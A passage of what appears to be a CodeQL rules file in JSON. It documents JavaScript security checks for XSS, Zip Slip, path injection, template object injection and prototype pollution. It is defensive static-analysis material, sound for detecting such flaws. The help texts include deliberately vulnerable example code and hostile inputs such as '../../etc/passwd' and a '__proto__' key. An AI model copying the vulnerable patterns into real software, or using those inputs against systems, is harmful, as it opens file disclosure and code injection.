vulnerability.", - "id" : "js/reflected-xss", - "kind" : "path-problem", - "name" : "Reflected cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/html-constructed-from-input", - "name" : "js/html-constructed-from-input", - 
"shortDescription" : { - "text" : "Unsafe HTML constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n 
document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. 
If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site 
scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using externally controlled strings to construct HTML might allow a malicious\n user to perform a cross-site scripting attack.", - "id" : "js/html-constructed-from-input", - "kind" : "path-problem", - "name" : "Unsafe HTML constructed from library input", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/stored-xss", - "name" : "js/stored-xss", - "shortDescription" : { - "text" : "Stored cross-site scripting" - }, - "fullDescription" : { - "text" : "Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. 
This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using uncontrolled stored values in HTML allows for\n a stored cross-site scripting vulnerability.", - "id" : "js/stored-xss", - "kind" : "path-problem", - "name" : "Stored cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/zipslip", - "name" : "js/zipslip", - "shortDescription" : { - "text" : "Arbitrary file access during archive extraction (\"Zip Slip\")" - }, - "fullDescription" : { - "text" : "Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. 
These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. 
If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n", - "markdown" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. 
This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path 
Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022" ], - "description" : "Extracting files from a malicious ZIP file, or similar type of archive, without\n validating that the destination file path is within the destination directory\n can allow an attacker to unexpectedly gain access to resources.", - "id" : "js/zipslip", - "kind" : "path-problem", - "name" : "Arbitrary file access during archive extraction (\"Zip Slip\")", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/path-injection", - "name" : "js/path-injection", - "shortDescription" : { - "text" : "Uncontrolled data used in path expression" - }, - "fullDescription" : { - "text" : "Accessing paths influenced by users can allow an attacker to access unexpected resources." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". 
For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", - "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from 
user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. 
This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], - "description" : "Accessing paths influenced by users can allow an attacker to access\n unexpected resources.", - "id" : "js/path-injection", - "kind" : "path-problem", - "name" : "Uncontrolled data used in path expression", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/template-object-injection", - "name" : "js/template-object-injection", - "shortDescription" : { - "text" : "Template Object Injection" - }, - "fullDescription" : { - "text" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an 
attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-073", "external/cwe/cwe-094" ], - "description" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.", - "id" : "js/template-object-injection", - "kind" : "path-problem", - "name" : "Template Object Injection", 
- "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/prototype-polluting-assignment", - "name" : "js/prototype-polluting-assignment", - "shortDescription" : { - "text" : "Prototype-polluting assignment" - }, - "fullDescription" : { - "text" : "Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], - "description" : "Modifying an object obtained via a user-controlled property name may\n lead to accidental mutation of the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", - "id" : "js/prototype-polluting-assignment", - "kind" : "path-problem", - "name" : "Prototype-polluting assignment", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/prototype-pollution-utility", - "name" : "js/prototype-pollution-utility", - "shortDescription" : { - "text" : "Prototype-polluting function" - }, - "fullDescription" : { - "text" : "Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object." 
